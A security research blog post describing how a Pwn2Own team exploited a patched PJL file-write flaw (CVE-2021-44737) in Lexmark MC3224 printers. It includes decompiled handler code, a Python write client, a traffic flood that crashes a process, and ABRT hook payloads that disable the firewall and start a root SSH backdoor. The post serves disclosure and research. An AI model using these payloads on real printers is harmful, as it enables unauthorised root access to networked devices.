Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)


This blog post describes a vulnerability found and exploited in October 2021 by Alex Plaskett, Cedric Halbronn, and Aaron Adams of NCC Group's Exploit Development Group (EDG). We successfully exploited it at the Pwn2Own 2021 competition in November 2021. Lexmark published a public patch and their advisory in January 2022, together with the ZDI advisory. The vulnerability is now known as CVE-2021-44737.

We decided to target the Lexmark MC3224i printer. However, it seemed to be out of stock everywhere, so we bought a Lexmark MC3224dwe printer instead. The main difference seems to be that the Lexmark MC3224i model has additional fax features whereas the Lexmark MC3224dwe model does not. From an analysis point of view, this means there could be a few differences, and some features would likely be out of reach. We downloaded the firmware updates for both models and they were exactly the same, so we decided to pursue since we didn’t have a choice anyway 🙂

As per Pwn2Own requirements, the vulnerability can be exploited remotely, does not need authentication, and exists in the default configuration. It allows an attacker to get remote code execution as the root user on the printer. The Lexmark advisory lists all the affected Lexmark models.

The following steps describe the exploitation process:

  1. A temporary file write vulnerability (CVE-2021-44737) is used to write an ABRT hook file
  2. We remotely crash a process in order to trigger the ABRT abort handling
  3. The abort handling ends up executing bash commands from our ABRT hook file

The temporary file write vulnerability is in the "Lexmark-specific" hydra service (/usr/bin/hydra), running by default on the Lexmark MC3224dwe printer. hydra is a pretty big binary and handles many protocols. The vulnerability is in the handling of Printer Job Language (PJL) commands, more specifically in an undocumented command named LDLWELCOMESCREEN.

We have analysed and exploited the vulnerability on the CXLBL.075.272/CXLBL.075.281 versions but older versions are likely vulnerable too. We detail our analysis on CXLBL.075.272 in this blog post since CXLBL.075.281 was released mid-October, and we had already been working on it.

Note: The Lexmark MC3224dwe printer is based on the ARM (32-bit) architecture, but it didn’t matter for exploitation, just for reversing.

We named our exploit "MissionAbrt" due to triggering an ABRT but then aborting the ABRT.

You said "Reverse Engineering"?

The Lexmark firmware update files that you can download from the Lexmark download page are encrypted. If you are interested in how our colleague Catalin Visinescu managed to get access to the firmware files using hardware attacks, please refer to the first installment of our blog series.

Vulnerability details


As Wikipedia says:

Printer Job Language (PJL) is a method developed by Hewlett-Packard for switching printer languages at the job level, and for status readback between the printer and the host computer. PJL adds job level controls, such as printer language switching, job separation, environment, status readback, device attendance and file system commands.

PJL commands look like the following:
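For instance, a minimal generic PJL job looks like the following (syntax taken from HP's public PJL reference, not Lexmark-specific; `<ESC>` denotes the 0x1B escape byte):

```
<ESC>%-12345X@PJL
@PJL COMMENT start of job
@PJL INFO ID
@PJL ENTER LANGUAGE = PCL
... print data ...
<ESC>%-12345X
```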


PJL is known to be useful for attackers. In the past, some printers had vulnerabilities allowing attackers to read or write files on the device.

PRET is a tool for speaking PJL (among other languages) to several printer brands, but it does not necessarily support all of their commands, since each vendor supports its own proprietary commands.

Reaching the vulnerable function

The hydra binary does not have symbols, but it has a lot of logging/error functions which contain function names. The code shown below is decompiled code from IDA/Hex-Rays, as no source code is available for this binary. Lots of PJL commands are registered by setup_pjl_commands() at address 0xFE17C. We are interested in the LDLWELCOMESCREEN PJL command, which seems proprietary to Lexmark and is undocumented.

int __fastcall setup_pjl_commands(int a1)
{
    ...
    pjl_ctx = create_pjl_ctx(a1);
    pjl_set_datastall_timeout(pjl_ctx, 5);
    pjlpGrowCommandHandler("UEL", pjl_handle_uel);
    ...
    pjlpGrowCommandHandler("LDLWELCOMESCREEN", pjl_handle_ldlwelcomescreen);
    ...
}

When a PJL LDLWELCOMESCREEN command is received, the pjl_handle_ldlwelcomescreen() function at 0x1012F0 starts handling it. We see this command takes a string representing a filename as its first argument:

int __fastcall pjl_handle_ldlwelcomescreen(char *client_cmd)
{
    result = pjl_check_args(client_cmd, "FILE", "PJL_STRING_TYPE", "PJL_REQ_PARAMETER", 0);
    if ( result <= 0 )
        return result;
    filename = (const char *)pjl_parse_arg(client_cmd, "FILE", 0);
    return pjl_handle_ldlwelcomescreen_internal(filename);
}

Then, the pjl_handle_ldlwelcomescreen_internal() function at 0x10A200 opens that file. Note that if the file already exists, the function returns immediately without opening it. Consequently, we can only write files that do not exist yet. Furthermore, the complete directory hierarchy has to already exist for the file to be created, and we also need permissions to write the file.

unsigned int __fastcall pjl_handle_ldlwelcomescreen_internal(const char *filename)
{
    if ( !filename )
        return 0xFFFFFFFF;
    fd = open(filename, 0xC1, 0777);        // open(filename, O_WRONLY|O_CREAT|O_EXCL, 0777)
    if ( fd == 0xFFFFFFFF )
        return 0xFFFFFFFF;
    ret = pjl_ldwelcomescreen_internal2(0, 1, pjl_getc_, write_to_file_, &fd); // goes here
    if ( !ret && pjl_unk_function && pjl_unk_function(filename) )
        return ret;
    ...
}

We will analyse pjl_ldwelcomescreen_internal2() below, but note that the file is closed at the end and then deleted with a remove() call. This means we can only write that file temporarily.
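The 0xC1 flags value in the open() call above decodes, on Linux, to O_WRONLY|O_CREAT|O_EXCL. A quick Python sketch confirms both the value and the refuse-if-exists behaviour that limits the primitive to files that do not exist yet:

```python
import os
import tempfile

# On Linux: O_WRONLY = 0x1, O_CREAT = 0x40, O_EXCL = 0x80 -> 0xC1,
# matching the decompiled open(filename, 0xC1, 0777) call.
flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL
assert flags == 0xC1

# O_EXCL makes open() fail if the file already exists.
path = os.path.join(tempfile.mkdtemp(), "welcome")
fd = os.open(path, flags, 0o777)   # first open: file is created
os.close(fd)
try:
    os.open(path, flags, 0o777)    # second open: refused
except FileExistsError:
    print("open with O_EXCL refused the existing file")
```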

Understanding the file write

Now let’s analyse the pjl_ldwelcomescreen_internal2() function at 0x115470. It will end up calling pjl_ldwelcomescreen_internal3() due to flag == 0 being passed by pjl_handle_ldlwelcomescreen_internal().

unsigned int __fastcall pjl_ldwelcomescreen_internal2(
        int flag,
        int one,
        int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
        ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
        int *p_fd)
{
    bad_arg = write_to_file == 0;
    if ( write_to_file )
        bad_arg = pjl_getc == 0;
    if ( bad_arg )
        return 0xFFFFFFFF;
    if ( flag )
        return pjl_ldwelcomescreen_internal3bis(flag, one, pjl_getc, write_to_file, p_fd);
    return pjl_ldwelcomescreen_internal3(one, pjl_getc, write_to_file, p_fd); // goes here due to flag == 0
}

We spent some time reversing the pjl_ldwelcomescreen_internal3() function at 0x114838 to understand its internals. The function is quite big and the decompiled code shown below is hardly readable, but the logic is still easy to understand.

Basically this function is responsible for reading additional data from the client and for writing it to the previously opened file.

The client data seems to be received asynchronously by another thread and saved into allocations tracked by a pjl_ctx structure. Hence, the pjl_ldwelcomescreen_internal3() function reads one character at a time from that pjl_ctx structure and fills a 0x400-byte stack buffer.

  1. If 0x400 bytes have been received and the stack buffer is full, it ends up writing these 0x400 bytes into the previously opened file. Then, it resets that stack buffer and starts reading more data to repeat that process.
  2. If the PJL command’s footer ("@PJL END DATA") is received, it discards that footer part, then it writes the accumulated received data (of size < 0x400 bytes) to the file, and exits.
unsigned int __fastcall pjl_ldwelcomescreen_internal3(
        int was_last_write_success,
        int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
        ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
        int *p_fd)
{
    unsigned int current_char_2; // r5
    size_t len_to_write; // r4
    int len_end_data; // r11
    int has_encountered_at_sign; // r6
    unsigned int current_char_3; // r0
    int ret; // r0
    int current_char_1; // r3
    ssize_t len_written; // r0
    unsigned int ret_2; // r3
    ssize_t len_written_1; // r0
    unsigned int ret_3; // r3
    ssize_t len_written_2; // r0
    unsigned int ret_4; // r3
    int was_last_write_success_1; // r3
    size_t len_to_write_final; // r4
    ssize_t len_written_final; // r0
    unsigned int ret_5; // r3
    unsigned int ret_1; // [sp+0h] [bp-20h]
    unsigned __int8 current_char; // [sp+1Fh] [bp-1h] BYREF
    _BYTE data_to_write[1028]; // [sp+20h] [bp+0h] BYREF

    current_char_2 = 0xFFFFFFFF;
    ret_1 = 0;
b_restart_from_scratch:
    len_to_write = 0;
    memset(data_to_write, 0, 0x401u);
    len_end_data = 0;
    has_encountered_at_sign = 0;
b_read_data_or_at:
    current_char_3 = current_char_2;
    while ( 1 )
    {
        current_char = 0;
        if ( current_char_3 == 0xFFFFFFFF )
        {
            // get one character from pjl_ctx->pData
            ret = pjl_getc(&current_char);
            current_char_1 = current_char;
        }
        else
        {
            // a previous character was already retrieved, let's use that for now
            current_char_1 = (unsigned __int8)current_char_3;
            ret = 1;                                // success
            current_char = current_char_1;
        }
        if ( has_encountered_at_sign )
            break;                                  // exit the loop forever
        // is it an '@' sign for a PJL-specific command?
        if ( current_char_1 != '@' )
            goto b_read_pjl_data;
b_handle_pjl_at_sign:
        len_end_data = 1;
        has_encountered_at_sign = 1;
        // from here, current_char == '@'
        if ( len_to_write + 13 > 0x400 )            // ? (13 == len("@PJL END DATA"))
        {
            if ( was_last_write_success )
            {
                len_written = write_to_file(p_fd, data_to_write, len_to_write);
                was_last_write_success = len_to_write == len_written;
                current_char_2 = '@';
                ret_2 = ret_1;
                if ( len_to_write != len_written )
                    ret_2 = 0xFFFFFFFF;
                ret_1 = ret_2;
            }
            current_char_2 = '@';
            goto b_restart_from_scratch;
        }
b_read_pjl_data:
        if ( ret == 0xFFFFFFFF )                    // error
        {
            if ( !was_last_write_success )
                return ret_1;
            len_written_1 = write_to_file(p_fd, data_to_write, len_to_write);
            ret_3 = ret_1;
            if ( len_to_write != len_written_1 )
                return 0xFFFFFFFF;                  // error
            return ret_3;
        }
        if ( len_to_write > 0x400 )
            goto b_restart_from_scratch;            // (reconstructed: defensive reset, body
                                                    // not visible in the decompiled dump)
        // append data to stack buffer
        data_to_write[len_to_write++] = current_char_1;
        current_char_3 = 0xFFFFFFFF;                // reset to enforce reading another character
                                                    // at next loop iteration
        // reached 0x400 bytes to write, let's write them
        if ( len_to_write == 0x400 )
        {
            current_char_2 = 0xFFFFFFFF;            // reset to enforce reading another character
                                                    // at next loop iteration
            if ( was_last_write_success )
            {
                len_written_2 = write_to_file(p_fd, data_to_write, 0x400);
                ret_4 = ret_1;
                if ( len_written_2 != 0x400 )
                    ret_4 = 0xFFFFFFFF;
                ret_1 = ret_4;
                was_last_write_success_1 = was_last_write_success;
                if ( len_written_2 != 0x400 )
                    was_last_write_success_1 = 0;
                was_last_write_success = was_last_write_success_1;
            }
            goto b_restart_from_scratch;
        }
    }                                               // end of while ( 1 )
    // we reach here if we encountered an '@' sign
    // let's check it is a valid "@PJL END DATA" footer
    if ( (unsigned __int8)aPjlEndData[len_end_data] != current_char_1 )
    {
        len_end_data = 1;
        has_encountered_at_sign = 0;                // reset so we read it again?
        goto b_read_data_or_at;
    }
    ++len_end_data;                                 // (reconstructed: tracks progress through the footer)
    if ( len_end_data != 12 )                       // len("PJL END DATA") = 12
    {
        // will go back to the while(1) loop but exit at the next
        // iteration due to "break" and has_encountered_at_sign == 1
        if ( current_char_1 != '@' )
            goto b_read_pjl_data;
        goto b_handle_pjl_at_sign;
    }
    // we reach here if all of "PJL END DATA" was parsed
    current_char = 0;
    pjl_getc(&current_char);                        // read '\r'
    if ( current_char == '\r' )
        pjl_getc(&current_char);                    // read '\n'
    // write all the remaining data (len < 0x400), except the "PJL END DATA" footer
    len_to_write_final = len_to_write - 0xC;
    if ( !was_last_write_success )
        return ret_1;
    len_written_final = write_to_file(p_fd, data_to_write, len_to_write_final);
    ret_5 = ret_1;
    if ( len_to_write_final != len_written_final )
        return 0xFFFFFFFF;
    return ret_5;
}
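To summarise the loop, here is a simplified Python model (our interpretation of the decompiled logic, not Lexmark code) of which bytes end up in the target file:

```python
FOOTER = b"@PJL END DATA"

def model_write(stream: bytes) -> bytes:
    """Simplified model of pjl_ldwelcomescreen_internal3():
    returns the bytes that would end up in the target file."""
    written = bytearray()
    buf = bytearray()
    i = 0
    while i < len(stream):
        # Footer: flush the buffered tail (footer excluded) and stop.
        if stream[i:i + len(FOOTER)] == FOOTER:
            written += buf
            return bytes(written)
        buf.append(stream[i])
        i += 1
        if len(buf) == 0x400:       # full 0x400-byte block: flush and restart
            written += buf
            buf.clear()
    # No footer received: a partial (< 0x400) buffer is never flushed,
    # which is why the exploit pads its payload to a 0x400 multiple.
    return bytes(written)
```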

The pjl_getc() function at 0xFEA18 retrieves one character from the pjl_ctx structure:

int __fastcall pjl_getc(_BYTE *ppOut)
{
    pjl_ctx = get_pjl_ctx();
    *ppOut = 0;
    InputDataBufferSize = pjlContextGetInputDataBufferSize(pjl_ctx);
    if ( InputDataBufferSize == pjl_get_end_of_file(pjl_ctx) )
    {
        pjl_set_eoj(pjl_ctx, 0);
        pjl_set_InputDataBufferSize(pjl_ctx, 0);
    }
    if ( pjl_get_state(pjl_ctx) == 1 )
        return 0xFFFFFFFF;                  // error
    if ( !pjlContextGetInputDataBufferSize(pjl_ctx) )
        abort();                            // assertion: "pjlContextGetInputDataBufferSize(pjlContext) != 0"
                                            // (exact call name truncated in the dump)
    current_char = pjl_getc_internal(pjl_ctx);
    ret = 1;
    *ppOut = current_char;
    return ret;
}

The write_to_file() function at 0x6595C simply writes data to the specified file descriptor:

int __fastcall write_to_file(void *data_to_write, size_t len_to_write, int fd)
{
    total_written = 0;
    do
    {
        while ( 1 )
        {
            len_written = write(fd, data_to_write, len_to_write);
            len_written_1 = len_written;
            if ( len_written < 0 )
                break;
            if ( !len_written )
                goto b_error;
            data_to_write = (char *)data_to_write + len_written;
            total_written += len_written;
            len_to_write -= len_written;
            if ( !len_to_write )
                return total_written;
        }
    }
    while ( *_errno_location() == EINTR );  // retry interrupted writes
b_error:
    printf("%s:%d [%s] rc = %d\n", "../git/hydra/flash/flashfile.c", 0x153, "write_to_file", len_written_1);
    return 0xFFFFFFFF;
}

From an exploitation perspective, what is interesting is that if we send more than 0x400 bytes, they will be written to the file, and if we refrain from sending the PJL command’s footer, the service waits for more data before it actually deletes the file.

Note: When sending data, we generally want to pad it to a multiple of 0x400 bytes to make sure our controlled data is actually flushed to the file.
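A minimal client for this primitive could look like the following Python sketch. Note the assumptions: the raw print port 9100, the exact LDLWELCOMESCREEN wire syntax, and the target address are inferred from the decompiled handlers and are hypothetical:

```python
import socket

def pad_to_block(data: bytes, block: int = 0x400) -> bytes:
    """Pad with spaces to a multiple of 0x400 so the buffered writer
    flushes all of our controlled data to the file."""
    if len(data) % block:
        data += b" " * (block - len(data) % block)
    return data

def write_temp_file(host: str, path: str, data: bytes) -> socket.socket:
    s = socket.create_connection((host, 9100))  # assumed raw print port
    s.sendall(b'@PJL LDLWELCOMESCREEN FILE="%s"\r\n' % path.encode())
    s.sendall(pad_to_block(data))
    # Deliberately do NOT send the "@PJL END DATA" footer: while the
    # connection stays open, the remove() call is delayed and the file
    # remains on disk (for roughly a minute, per the testing below).
    return s

# sock = write_temp_file("192.168.1.10",  # hypothetical printer address
#                        "/var/fs/shared/eventlog/logs/debug.log.1",
#                        b"A" * 0x1000)
```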

Confirming the temporary file write

There are several CGI scripts showing the content of files on the filesystem. For instance, /usr/share/web/cgi-bin/eventlogdebug_se's content is:

echo "Expires: Sun, 27 Feb 1972 08:00:00 GMT"
echo "Pragma: no-cache"
echo "Cache-Control: no-cache"
echo "Content-Type: text/html"
echo "<HTML><HEAD><META HTTP-EQUIV=\"Content-type\" CONTENT=\"text/html; charset=UTF-8\"></HEAD><BODY><PRE>"
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Retrieved Reports ++++++++++++++++++++++]"
for i in 9 8 7 6 5 4 3 2 1 0; do
    if [ -e /var/fs/shared/eventlog/logs/debug.log.$i ] ; then
        cat /var/fs/shared/eventlog/logs/debug.log.$i
        echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
        echo ""
        echo ""
    fi
done
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Configurations ++++++++++++++++++++++]"
rob call applications.eventlog getAELConfiguration n
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo "</PRE></BODY></HTML>"

Consequently, we write the /var/fs/shared/eventlog/logs/debug.log.1 file filled with lots of 'A' characters using the previously discussed temporary file write primitive.

We confirm the file is successfully written by accessing the CGI page:

From testing, we noticed that the file would be automatically deleted after between 1 minute and 1 minute 40 seconds, probably due to a timeout in the PJL handling in hydra. This means we can safely use that temporary file primitive for 60 seconds.


Exploiting the crash event handler aka ABRT

We spent quite some time trying to find a way to execute code. We caught a break when we noticed several configuration files that define what to do when a crash occurs:

$ ls ./squashfs-root/etc/libreport/events.d
abrt_dbus_event.conf      emergencyanalysis_event.conf  rhtsupport_event.conf  vimrc_event.conf
ccpp_event.conf           gconf_event.conf              smart_event.conf       vmcore_event.conf
centos_report_event.conf  koops_event.conf              svcerrd.conf
coredump_handler.conf     print_event.conf              uploader_event.conf

For instance, coredump_handler.conf executes shell commands:

# coredump-handler passes /dev/null to abrt-hook-ccpp which causes it to write
# an empty core file. Delete this file so we don't attempt to use it.
EVENT=post-create type=CCpp
    [ "$(stat -c %s coredump)" != "0" ] || rm coredump

The following excerpt from the ABRT documentation describes well how ABRT hooks work:

If a program developer (or package maintainer) requires some specific information which ABRT is not
collecting, they can write a custom ABRT hook which collects the required data for his program
(package). Such hook can be run at a different time during the problem processing depending on how
"fresh" the information has to be. It can be run:

1. at the time of the crash
2. at the time when user decides to analyse the problem (usually run gdb on it)
3. at the time of reporting

All you have to do is create a .conf and place it to /etc/libreport/events.d/ from this template:

   <whatever command you like>

The commands will execute with the current directory set to the problem directory (e.g:

If you need to collect the data at the time of the crash you need to create a hook that will be run as 
a post-create event.

WARNING: post-create events are run with root privileges!

From the above we can determine we need a post-create event and we know it will be executed as root if/when a crash event is actually handled by ABRT.

Finding a process crash

There are several ways to crash a process; doing so usually results in a blue screen of death (BSOD) being shown, after which the printer reboots:

Such a process crash is enough to trigger the ABRT behaviour. Once we have such a crash, abrtd should trigger the post-create event of our controlled file. By starting our own long-running process (e.g. netcat, ssh) that never returns, we prevent the crash handling from continuing, so it never results in a BSOD.

We abuse a bug in awk to trigger the crash. The version of awk used on the printer is quite old, so it has some bugs that don’t appear to exist in more modern versions. On the device, if an awk command is run on a non-existent file, an invalid free() can be triggered:

# awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print a[i]}' /tmp/doesnt_exist
free(): invalid pointer

In order to trigger this remotely we abuse a race condition that exists due to the second-based granularity (%S format specifier) used for naming log files in apache2. The configuration has the following line:

ErrorLog "|/usr/sbin/rotatelogs -L '/run/log/apache_error_log' -p '/usr/bin/' /run/log/apache_error_log.%Y-%m-%d-%H_%M_%S 32K"

The above will trigger a log rotation for every 32KB of logs that are generated, with the resulting log file having a name that is unique only at a one-second granularity. As a result, if enough HTTP logs are generated such that rotation occurs twice within one second, then two instances of the log post-processing script may be parsing a file with the same name at the same time. In that script we see the following:

rm -f "${path_to_logs}"apache_error_log*.tar.gz
if [[ "${file_to_compress}" ]]; then
    echo "Compressing ${file_to_compress} ..."
    tar -czf "${file_to_compress}.tar.gz" "${file_to_compress}"
    if [[ ${compress_exit_code} == 0 ]]; then
        echo "File ${file_to_compress} was compressed."
        echo "Check apache server status if needed to restart"
        to_restart=$(awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print a[i]}' "${file_to_compress}")
        if [ $to_restart -gt "5" ]; then
            echo "Time to restart apache .."
            rm -f "${path_to_logs}"apache_error_log*
            systemctl restart apache2
        fi
        rm -rf "${file_to_compress}"
    else
        echo "Error compressing file ${file_to_compress} (tar exit code: ${compress_exit_code})."
        exit ${compress_exit_code}
    fi
fi

Above, file_to_compress is the apache error log file generated per the ErrorLog line shown earlier. After compressing the file successfully, the awk command is run against the file to determine if apache should be restarted, and otherwise the file is deleted. The problem arises when multiple instances of this script run at the same time: one instance deletes the log file from disk, and a second instance runs awk on the file that no longer exists, which triggers the awk crash noted above.

This crash can be triggered simply by sending a lot of HTTP traffic to the device.
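Generating that traffic can be as simple as the following sketch (hostname and path are hypothetical; requests that fail still produce apache error-log lines, which is all we need):

```python
import concurrent.futures
import urllib.request

def hit(url: str) -> int:
    """Send one request; return the HTTP status, or -1 on any error.
    Errors are fine: they still generate error-log lines."""
    try:
        with urllib.request.urlopen(url, timeout=2) as r:
            return r.status
    except Exception:
        return -1

def flood(url: str, n: int = 5000, workers: int = 32) -> None:
    """Hammer the server so the error log rotates twice within one second."""
    with concurrent.futures.ThreadPoolExecutor(workers) as pool:
        list(pool.map(hit, [url] * n))

# flood("https://192.168.1.10/cgi-bin/doesnotexist")  # hypothetical target
```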

Although we used this awk crash to trigger code execution, any remote pre-auth crash should be usable as long as it triggers ABRT to run.

Putting it all together

We use our temporary file write primitive to create the /etc/libreport/events.d/abort_edg.conf file with the following content (padded with lots of spaces due to the requirements explained earlier):

EVENT=post-create /bin/ping -c 4
        iptables -F
        /bin/ping -c 4

We trigger a process crash, which causes ABRT to execute the commands above. We use interleaved ping commands to confirm when each intermediate command has been executed. We confirm the 8 ping packets are received using Wireshark. Then, we are able to connect to a listening service on the printer that is normally blocked by the firewall, confirming the firewall has been successfully disabled.

The following ABRT hook file disables the firewall, configures SSH and starts it:

EVENT=post-create iptables -F
    /bin/rm /var/fs/security/ssh/ssh_host_key
    mkdir /var/run/sshd || echo foo
    /usr/bin/ssh-keygen -b 256 -t ecdsa -N '' -f /var/fs/security/ssh/ssh_host_key
    echo "ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBABl6xVq6dGu40kDyxwjlMw7sxq4JGhVdc4hvDlDPPhzmAyEBkUWZOPRsLcWYm5kDJN6zFPTS0a4KNbx56qICwkyGAHfRv/+lVMxO2BEPJyYUUdpRC3qmUx0xy3GlgpOUUl90LgiifwcO6UI0P4l+UsewOrDdP6ycuklzJCaa7jLlPkMjQ==" > /var/fs/security/ssh/authorized
    /usr/sbin/sshd -D -o PermitRootLogin=without-password -o AllowUsers=root -o AuthorizedKeysFile=/var/fs/security/ssh/authorized -h /var/fs/security/ssh/ssh_host_key
    while true; do /bin/ping -c 4; sleep 10; done

The exploit in action:

$ ./ -i
(13:20:01) [*] [file creation thread] running
(13:20:01) [*] Waiting for firewall to be disabled...
(13:20:01) [*] [file creation thread] connected
(13:20:01) [*] [file creation thread] file created
(13:20:01) [*] [crash thread] running
(13:20:09) [*] Firewall was successfully disabled
(13:20:09) [*] [crash thread] done
(13:20:10) [*] [file creation thread] done
(13:20:10) [*] All threads exited
(13:20:10) [*] Waiting for SSH to be available...
(13:20:10) [*] Spawning SSH shell
Line-buffered terminal emulation. Press F6 or ^Z to send EOF.

ABRT has detected 1 problem(s). For more info run: abrt-cli list
uid=0(root) gid=0(root) groups=0(root)

We can see that sshd was started under abrtd:

root@XXXXXXXXXXXXXX:~# ps -axjf
   1  772  772  772 ?           -1 Ssl      0   0:00 /usr/sbin/abrtd -d -s
 772 2343  772  772 ?           -1 S        0   0:00  \_ abrt-server -s
2343 2550  772  772 ?           -1 SN       0   0:00      \_ /usr/libexec/abrt-handle-event -i --nice 10 -e post-create -- /var/fs/shared/svcerr/abrt/ccpp-2021-10-20-07:06:21-2117
2550 2947  772  772 ?           -1 SN       0   0:00          \_ /bin/sh -c echo 'mission abort!'             iptables -F             echo 'mission abort!'             /bin/rm /var/fs/security/ssh/ssh_host_key             echo 'mission a
2947 2952  772  772 ?           -1 SN       0   0:00              \_ /usr/sbin/sshd -D -o PermitRootLogin=without-password -o AllowUsers=root -o AuthorizedKeysFile=/var/fs/security/ssh/authorized -h /var/fs/security/ssh/ssh_host_key
2952 3107 3107 3107 ?           -1 SNs      0   0:00                  \_ sshd: root@pts/0
3107 3109 3109 3109 pts/0     3128 SNs      0   0:00                      \_ -sh
3109 3128 3128 3109 pts/0     3128 RN+      0   0:00                          \_ ps -axjf

Final words on Pwn2Own

When participating at Pwn2Own, our first attempt failed due to an unknown SSH error that we had not encountered in our own testing environment. We could see that our commands were executed (the firewall was disabled and the SSH server was started and reachable), but it would not let us connect. Prior to the Pwn2Own event, during exploit development, we had also tested a netcat payload, so we decided to start both payloads on the second attempt, which made us win. This shows that having backup plans is always useful when participating at Pwn2Own!